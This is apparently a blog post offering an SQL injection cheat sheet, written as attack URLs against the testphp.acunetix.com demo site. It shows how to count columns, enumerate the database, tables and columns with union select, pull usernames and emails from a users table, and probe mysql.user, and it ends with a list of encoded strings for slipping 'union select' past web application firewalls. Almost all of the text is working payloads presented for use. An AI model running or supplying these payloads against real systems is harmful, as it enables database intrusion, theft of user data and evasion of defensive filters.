SQLi Cheat Sheet




Cheat Sheet


Below is a working, non exhaustive list, of useful SQL injection variables used to extract data from databases and systems from the URL.

If you have anything you feel could be added to any of the lists please feel free to write them in the comments and I'll update them accordingly.

Test number of Columns - Watch for Error
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4 -- LIMIT 1
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 2/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 3/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 4/*


Test Injectable Columns - Watch for visual indicators (WAF Filters)
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3,4
http://testphp.acunetix.com/listproducts.php?cat=1 -1 /*!UNiOn*/ /*!SeLEct*/ 1,database(),3,4,5,6,7,8,9,10,11
 http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/**//*!12345UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
 http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20%20/**//*!50000UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20/**/UNION/**//*!50000SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/*!50000UniON%20SeLeCt*/%201,database%28%29,3,4,5,6,7,8,9,10,11
--*See the 'Web filter Bypass Keywords' below for more*--


Enumerate Information
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,@@version,3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,hex(unhex(@@version)),3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,convert(@@version using latin1),3,4


Enumerate Database
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,database(),3,4


Enumerate Tables
http://testphp.acunetix.com/listproducts.php?cat=1 -1 union all select 1,2,3,4,5,6,7,8,table_name,10,11 from information_schema.tables


Enumerate Columns
http://testphp.acunetix.com/artists.php?artist=1 -1 union select all 1,2,column_name,4 from information_schema.columns where table_schema='database' and table_name='table_name' LIMIT 1,1 -- - LIMIT 1

Enumerate Raw Data
http://testphp.acunetix.com/listproducts.php?cat=1 union select all 1,2,3,4,5,6,group_concat(uname,0x10a,email),8,9,10,11 FROM users

Confirm MYSQL version - If Returns true then end value is true
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=4
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=


Test if subselect works - If returns Tue then subselect works
testphp.acunetix.com/listproducts.php?cat=1 and (select 1)=1

 
If subselect works, test for mysql.user - if returns true then it works
testphp.acunetix.com/listproducts.php?cat=1 and (select 1 from mysql.user limit 0,1)=1
 

Injection                                                              

@@hostname                             
@@tmpdir
@@datadir
@@basedir
@@log
@@log_bin                                                                
@@log_error                                                          
@@binlog_format                       
@@time_format                                                    
@@date_format                                                    
@@ft_boolean_syntax                                           
@@innodb_log_group_home_dir                                            
@@new                                                                  
@@version                                                              
@@version_comment
@@version_compile_os
@@version_compile_machine
@@GLOBAL.have_symlink
@@GLOBAL.have_ssl
@@GLOBAL.VERSION

version()                                                            
table_name()                                                           
user()                                                                 
system_user()                                                          
session_user()
database()                                                             
column_name()                                                          
collation(user())                                                      
collation(\N)                                                          
schema()
UUID()
current_user()
current_user


dayname(from_days(401))                                                
dayname(from_days(402))                                                
dayname(from_days(403))                                                
dayname(from_days(404))                                                
dayname(from_days(405))                                                
dayname(from_days(406))                                                
dayname(from_days(407))                                                

monthname(from_days(690))                                              
monthname(from_unixtime(1))
                                          
collation(convert((1)using/**/koi8r))

(select(collation_name)from(information_schema.collations)where(id)=1 
(select(collation_name)from(information_schema.collations)where(id)=23 
(select(collation_name)from(information_schema.collations)where(id)=36 
(select(collation_name)from(information_schema.collations)where(id)=48 
(select(collation_name)from(information_schema.collations)where(id)=50 
------forever----


Adding Gaps Between requests

testtest        nospace    0x1a
test*test       *              0x2a
test:test       :                0x3a
test::test      ::                0x3a3a
testJtest       J               0x4a
testZtest      Z              0x5a
testjtest        j               0x6a
testztest       z               0x7a
testtest        nospace     0x8a
testtest        nospace     0x9a
test test       SPACE     0x10a


Web Filter Bypass 'union select' keyword strings


union select           
!UNiOn*/ /*!SeLEct*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*--*/union/*--*/select/*--*/
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0D%0ASeleCt%0D%0A 
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 

No comments:

Post a Comment